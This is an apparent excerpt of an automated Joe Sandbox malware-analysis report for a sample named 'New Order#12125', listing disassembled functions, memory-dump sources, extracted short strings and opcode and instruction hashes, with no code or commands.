                                                                        • Opcode Fuzzy Hash: 9dfb0b19505b69eaf0612c8e21290e9fbbf252fb91581cf798ffad894159cbde
                                                                        • Instruction Fuzzy Hash: 1D316172A016199FDB60DF2DCC80BEEB7F8FB54610F54455AE949E7240EB30AA458BB0
                                                                        Function 01509126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$@
                                                                        • API String ID: 0-1194432280
                                                                        • Opcode ID: 31c3c65fa9942e252c165572b52be184c6a15ea05ca707ecebc343e13c9b6805
                                                                        • Instruction ID: 606dc83c29c6440f42b2ec85adfd14d26c78edc35c92e940ed71388a021889b6
                                                                        • Opcode Fuzzy Hash: 31c3c65fa9942e252c165572b52be184c6a15ea05ca707ecebc343e13c9b6805
                                                                        • Instruction Fuzzy Hash: FC810D71D0166A9BDB369B54CC44BEEB6B8BB48754F0041DAEA1DBB280D7705E84CFA0
                                                                        Function 0158CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0158CFBD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1802265375.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14d0000_New Order#12125.jbxd
                                                                        Similarity
                                                                        • API ID: CallFilterFunc@8
                                                                        • String ID: @$@4Qw@4Qw
                                                                        • API String ID: 4062629308-2383119779
                                                                        • Opcode ID: de033c0dc5c996bfcfe55db9b8fb078bf0b336b2f2353508c50f724f8baf4203
                                                                        • Instruction ID: 42c1052164b58b58c2887181ddc0ddcabc16cfb74a84d37970bb1d3ae3dcc1e3
                                                                        • Opcode Fuzzy Hash: de033c0dc5c996bfcfe55db9b8fb078bf0b336b2f2353508c50f724f8baf4203
                                                                        • Instruction Fuzzy Hash: EE41A071900216DFEB21AFA9C840AADBBF8FF95750F00442EEA15EF294E730D805DB61